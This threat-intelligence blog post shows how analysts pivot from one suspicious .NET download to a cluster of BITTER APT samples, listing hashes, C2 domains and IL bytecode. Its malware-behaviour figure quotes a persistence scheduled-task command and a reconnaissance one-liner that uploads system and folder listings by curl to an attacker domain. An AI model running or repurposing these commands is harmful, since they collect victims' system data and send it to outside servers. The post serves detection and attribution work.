Don't get BITTER about being targeted -- fight back with the help of the community.

February 29, 2024 by StrikeReady Labs 7 minutes

When enterprise SOCs are alerted to an obvious “True Positive” detection from their tooling, they want to quickly understand whether this threat is something they should go DEFCON 1 on, or not. Any threat that successfully compromises a company needs to be contained quickly, but your boss wants to know whether there is a Bigger Picture to the attack – this is where a Threat Intelligence analyst can shine.

Ten years ago, most analysis of APT groups was closely held by victims and vendors alike, or at least only discussed in hushed tones. Although there will always be a governor on certain information, there has been an unmistakeable democratization of analysis in the TLP-white community. It’s difficult to upload a sample to VirusTotal from a mainstream APT group, and not have it tweeted within hours by a number of eagle-eyed researchers.

Analysts would love to take advantage of this type of OSINT to quickly triage threats, but often are bound by privacy and secrecy restrictions — they’re restricted from submitting files to VirusTotal, to avoid accidentally submitting sensitive or company-identifying data. The Boss does not appreciate dodgy-but-legitimate internal Excel macros making their way to thousands of malware corpuses.

We’ve designed CARA to guide analysts in their workflows, to suggest investigative steps they can take, without compromising internal controls. In this example, a rule triggered for files downloaded with non-matching extensions.

isndatumhost[.]com/cvrss.jpgPE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows20aa80472d58350f1f7d61026b0ee97932ef6f6a607706034863c6a878d83d2a2024-02-24

Figure 1: original sample

Typically, an analyst might search for a hash on VT, or a similarly masked “csrss.exe”, but as of this writing, it is not available.

When trying to understand context of a particular threat, there are three simple concepts that can quickly broaden your aperture for similar “stuff”:

  • In the same small-time window, what other files were served from this domain/ip?
  • In the same small-time window, what other files talked (beaconed, etc.) to this domain/ip?
  • What other files have exhibited behavior that sticks out to an analyst? This could be strange capitalization, particular orders of options/arguments, an odd way of referencing a file, deep RE, etc

Initial phish

Figure 2: CARA capability to search for related files based on domain coming Q2 '24


Figure 3: a sample served from the same domain in the same time period

The goal is to quickly triage this threat, so first we’ll try to find samples with similar behavior.

interesting behaviors for potential pivots
schtasks /create /tn DriverUpdates /f /sc minute /mo 15 /tr [payload]
systeminfo > C:\Users\Public\Music\desk.txt & tasklist >> C:\Users\Public\Music\desk.txt & dir "C:\Users\%USERNAME%\Desktop" >> C:\Users\Public\Music\desk.txt & dir "C:\Users\%USERNAME%\Downloads" >> C:\Users\Public\Music\desk.txt & dir "C:\Users\%USERNAME%\Documents" >> C:\Users\Public\Music\desk.txt & curl -X POST -F "file=@C:\Users\Public\Music\desk.txt" commonlifesupport[.]com/ssu.php?s=%computername%_%username%

Figure 4: pivot on a scheduled task with particular arguments, or `%computername%_%username%`

Both the name and the order of switches sticks out as suspicious, so we’ll quickly look to see if we can find that behavior in other samples. The goal is to broadly understand if the behavior is truly abnormal, or if we need to keep looking.

Initial phish

Figure 5: CARA capability to search StrikeReady’s backend for files with matching behavior coming Q2 '24

Immediately we can start to see lots of CHM files that exhibit similar behavior. We can start to build up our set of “potentially related files” through the simple pivots mentioned above.

sha256sample name from VT
5a12c312fa06cce9aa92496fb69cfec6f814d0d3622e1ad17c2fafd79d64a087version of the project application.chm
62e42d3e778fd79b7989966b057c24c141531f871a7c73703b35858ab3d13f47Circular .chm
83ca53918af3ea659d767e489a1e42ea97879e3e534f68c4edc7d0eb77f44204MoHA Border and Immigration Section Order.chm

Figure 6: first pass of related files by similar behavior

One may also reverse engineer the sample to discover unique C# functions, or IL bytecode, to hunt.

“fn_WebF_nvc"“7E 23 00 00 04 28 1A 00 00 0A  28 4A 00 00 06 28 5E 00 00 0A 6F 5F 00 00 0A 0B 16 0C 2B 1E 07 08”
Figure 7: unique looking .NET function list, or suspected-to-be-unique IL bytecodeFigure 7: unique looking .NET function list, or suspected-to-be-unique IL bytecode

Figure 7: unique looking .NET function list, or suspected-to-be-unique IL bytecode

We can search easily search through samples available via CARA:

Initial phish

Figure 8: CARA capability to search through content in SR’s backend coming Q2 '24

It may be useful to download large batches of samples for offline processing, or to discover further pivots. Automated similarity analysis is useful, but nothing beats a human eyeball.

Initial phish

Figure 9: CARA capability to bulk download files from SR coming Q2 '24

One more round of pivots on newly convicted files/domains leads us to files with a URL/URI pattern that your eyes can easily pick out. Pivoting often leads to infection chains slightly different than your original sample, for instance, this pdf->rar->lnk->malware.

Initial phish

Figure 10: A sample with a different infection chain exhibiting similar end behavior

The last step of analysis is always to collate indicators, and do one final look to see what other people in the world are saying about the file/ip/domain. With a couple simple (automate-able) pivots, we were able to go from one unknown, untagged alert, to a handful of recent and similar files, many tagged by the community as BITTER. In the modern malware analysis world, many folks put out useful commentary about targeted threats on VirusTotal. These analysts are sometimes independent, such as Phillipp , or work at high quality vendors such as Nextron Systems or Stop Malvertising. VirusTotal comments are clearly a useful place to highlight the detection capability of these commercial products, as can be seen from our simple “show me similar files” exercise.

sha256sample name from VTc2VT Comments
2fe49d93b5dcf19a2b60e91756246b051adc89303151c9e0b875c3f21c698be9passport enquiry.docxonlinehealthmatters[.]info/urban/rute.php?fox=StopMalvertising #bitter #apt
561ace43f77de135d5b3286bd2ef270b185d0abdba15d442551211068f8bbf11SUSPECTED FOREIGN TERRORIST FIGHTERS.chmwbfashionshow[.]com/TERM/rig.php?min=
f598f3bd60a39ad5861f145e82b33acde146b6ed5c2ffd9c6862ca1ea635afbf【邮件监控】国家政务服务平台安全(安全管理中心、安全事件分析系统)检查报告(2023-02-01).chmdracjohnsupport[.]com/park/jeff.php?wan=StopMalvertising #bitter #apt
636c2a16f94b5e30e725527a1bd2215399f98f17cc08580bc7358751b9eb2944K2K3 Schedule.chmjlmusiklearn[.]com/est/api.php?mag=StopMalvertising #bitter #apt
382c64eae475fbd849914e37624f58892f72fd97517de88d368535213816961d382c64eae475fbd849914e37624f58892f72fd97517de88d368535213816961d.chmerswuniconsharing[.]com/rest/api.php?rver=StopMalvertising #bitter #apt
4f94e7bd1515e0025293fb5a041bc41c20a7dd15a6dd0bc7076145a69d5238c0CCS20230522.chmfolkmusicstreams[.]com/TIME/mac.php?sit=StopMalvertising #bitter #apt
490eccbb2712e7752a0ba193f783de9d333f67ba1fde5bb130280c5abf77555aEvaluation for Development Projects.chmnovasapothecary[.]com/REXI/info.php?max=StopMalvertising #bitter #apt
a2e3f464e1c39909f47f0b837b04e1256061f4a9698678e097b4dd09aa4de9c1Nepal’s Relation with European Countries.chmdaveonenewtestpanel[.]com/axis/cone.php?rad=StopMalvertising #bitter #apt
9ad342489796e18fb385d5874d9a9867418a3b01d6f65307e9c183ec04494a70Copy of order.chmxiuxonlinehost[.]com/VZAD/gls.php?pop=StopMalvertising #bitter #apt
7f8dec191ee184b7b776dc24841a24291020a0338ede80bebb34c2bc4e6bc47cзөвшөөрлийн маягт.chmmxsiclienteventlog[.]com/ROAM/gret.php?max=liqingjia #bitter
445c801e857329e1740745b4949349a02971530c4f5d28a8e9e5489c3516933aEvent ScheduleJan24.chmfarlookclinic[.]com/DMMA/hfo.php?pi=NeikiAnalytics #bitter #chm
c77ae7c9533eddbb5f2b80889590436aac7df6166abefc51d5a65f775e6258dcLetter - Mr Suriyapong KUMSOPAR (FS-THA5057-2200482 CPR).chmmikeyourevents[.]com/CP/tre.php?pi=
876122fcc9e0d5ebd42df9e93d37ad23d9f521e6077e9cb8b05862ae157757e320240123CN-ENG.chmnorthgenstudios[.]com/ML/vbn.php?pi=wwwab #apt #apt-c-08 #bitter
c0d926b33ae2351a9a528ba4d7ca13be7d55ba3455d52c5a69c8b381ade28ed0wmncvis.exekaatmusiclab[.]comMalGamy #bitter #mal_apt_bitter_backdoor_aug23
825abcdd216c1f717951b02cf8d91ab6b3bdf915fb5532ebb400e15e6625e0afujpe.jpgjjwappconsole[.]comMalGamy #bitter #mal_apt_bitter_backdoor_aug23
66a73b1b3b51a1c6a56db2d20cff9af3d1362b989989b5d9543d2e9b92ac9a3dsysvjjwappconsole[.]comMalGamy #bitter #mal_apt_bitter_backdoor_aug23
c24efc7c4dafd4f0b39e7ae7e84627fbd0fb766019b820cb11edbb8dda54de66jjwappconsole[.]comMalGamy #bitter #mal_apt_bitter_backdoor_aug23
c492bdf749b0a229cb256e1ee04e1c48b7472a351f04605415c11d40063cd14ahytrs.exehallanskylarks[.]comFlorian Roth APT_MAL_Bitte_Elephant_Nov21_1
5a12c312fa06cce9aa92496fb69cfec6f814d0d3622e1ad17c2fafd79d64a087version of the project application.chmmikeyourevents[.]comFlorian Roth APT_MAL_Bitte_Elephant_Nov21_1 Roth APT_MAL_Bitte_Elephant_Nov21_1
62e42d3e778fd79b7989966b057c24c141531f871a7c73703b35858ab3d13f47Circular Roth APT_MAL_Bitte_Elephant_Nov21_1
83ca53918af3ea659d767e489a1e42ea97879e3e534f68c4edc7d0eb77f44204MoHA Border and Immigration Section Roth APT_MAL_Bitte_Elephant_Nov21_1
e8b7fffa0a2d8a2051c3272bfaefffe7174707756cb8469c0f985bfa03fce476List of participants for Ops training.chmmyprivatehostsvc[.]com/assets/js.php?h=
eaa013b863bda3bd76c6f6073cc304002d1a9f317c8fba9c362534aff7dd1b0b军贸采购合同.docx .chmdiyefosterfeeds[.]com
b4ab34aa754c979e6173d8b73f1d56611fd4e82801dd4a11cc7ce7a37f3db6c1SOP for Logging out Mail and PCs.chmmyprivatehostsvc[.]com/xuisy/css.php?h=
b514635f569791316e1c55057f63f596847e23c0fa1ca0f751c5a2135f72b8ff2022 China Medical Device Outbound Conference Invitation Letter.chmmobisharestock[.]com/csxdz/wave.php/?h=
b0f8c8e48d4a1e78550bda551745219613cc3dca7068da86688b95051d7c249eMoM APSCO and SUPARCO Meeting_09 Sept 2022.chmnovaoutletclub[.]com/drop/fall.php?st=
510b3de50c8dfc20a3085166f373a5f12475c7915984de0afa3cc0bff0c2580dSTM_ESTABLISMENT OF GWADAR PROJECT.chmdnldsalecraze[.]com/critical/shopper.php?crt=
35a7feb273ad532b79a5b9e0536642c23c888ec9338369b2159d6f42e2b626e7Meeting Notice.raradamsresearchshare[.]com/mack.phpPaul Hager #susp_rar_with_cloaked_lnk_jun22
408292710999abc4d37f23a6672ef407d70ffb4dc2e3e030a5ec705735c1f8bdMeeting Notice.pdf.lnkadamsresearchshare[.]com/textcmd/cmd1.phpFlorian Roth SUSP_LNK_SuspiciousCommands_Jan23_3
6d33065e91a1159142ba61e4982190bfe02235b60808a33275ff9ccc688b7f23Abroad_Training_Nominations_Jan_2024.rarPaul Hager #susp_rar_with_cloaked_lnk_jun22
92307952ceb92be981ba8c1c83febf11e6379e1ee492436ee7caff08bb290fbbAbroad_Training_Nominations_Jan_2024.pdf.lnkadamsresearchshare[.]com/textcmd/cmd1.phpPaul Hager #susp_rar_with_cloaked_lnk_jun22
8cfc803459682619e97f172e9cca33458fdf38b0b9ca09f8ccbc7df16f09240fBrief and TPs for Pakistan-China relations for 2022 Annual Meeting.chmupdnangelgroup[.]com/ridge/visors.php?crt=
06dd9a7aebe0995b23526f04eabc85db3d2d98def9be58c1012a1280f5aa63f1Forensic Evidence on Crime Scene.chmellearningstore[.]com/rest/api.php?rst=
5b90d4c397e575965ed49082981fd34272b5e1da010057f6ebcdd4f53a409ad0Invitation for upcoming seminar on Industrial meet of Pakistan Industries with China.docx.chmwcnsappword[.]com/wmis/wave.php?xas=

Figure 11: Our final set of recently distributed files that matches our behavior, domain, or bytecode

For an easier to parse list of indicators, please our GitHub page.You can read more about Sidewinder here. Lastly, If you are a vendor, and wish to provide a statement of suspected attribution, please drop us a note, and we’ll add it for posterity.

Vendor Threat Actor name
Proofpoint TA397

Figure 12: Other validated vendor names for this actor


The authors would like to thank the internal reviewers, as well as peer vendors, for their comments and corrections. Please get in touch at if you have further corrections, or would like to collaborate on research in the future.

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